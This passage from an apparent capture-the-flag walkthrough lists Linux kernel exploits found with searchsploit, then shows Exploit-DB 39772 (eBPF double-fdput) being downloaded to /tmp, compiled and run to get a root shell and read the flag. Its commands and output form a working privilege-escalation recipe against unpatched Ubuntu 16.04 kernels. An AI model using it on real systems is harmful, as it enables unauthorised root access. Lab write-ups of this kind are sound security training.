Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Poi | linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Conditi | linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out- | linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' R | windows_x86-64/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) P | linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privile | linux/local/40489.txt
Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer | linux/dos/45919.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escala | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Lo | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privile | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zo | linux/local/47169.c
-------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Among these, the entries marked Local Privilege Escalation are the privilege escalation code.
So this time, linux/local/39772.txt (www.exploit-db.com) is used.
/tmp is writable even at the lowest privilege level, so downloading there with wget works.
$ unzip 39772.zip
Archive: 39772.zip
creating: 39772/
inflating: 39772/.DS_Store
creating: __MACOSX/
creating: __MACOSX/39772/
inflating: __MACOSX/39772/._.DS_Store
inflating: 39772/crasher.tar
inflating: __MACOSX/39772/._crasher.tar
inflating: 39772/exploit.tar
inflating: __MACOSX/39772/._exploit.tar
$ cd 39772
$ ls
crasher.tar
exploit.tar
$ tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
$ cd ebpf_mapfd_doubleput_exploit
$ ls
compile.sh
doubleput.c
hello.c
suidhelper.c
$ ./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
whoami
root
Got root.
cd /root
ls
the-flag.txt
cat the-flag.txt
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
Congratulations are in order. :-)
I hope you've enjoyed this challenge as I enjoyed making it.
If there are any ways that I can improve these little challenges,
please let me know.
As per usual, comments and complaints can be sent via Twitter to @DCAU7
Have a great day!!!!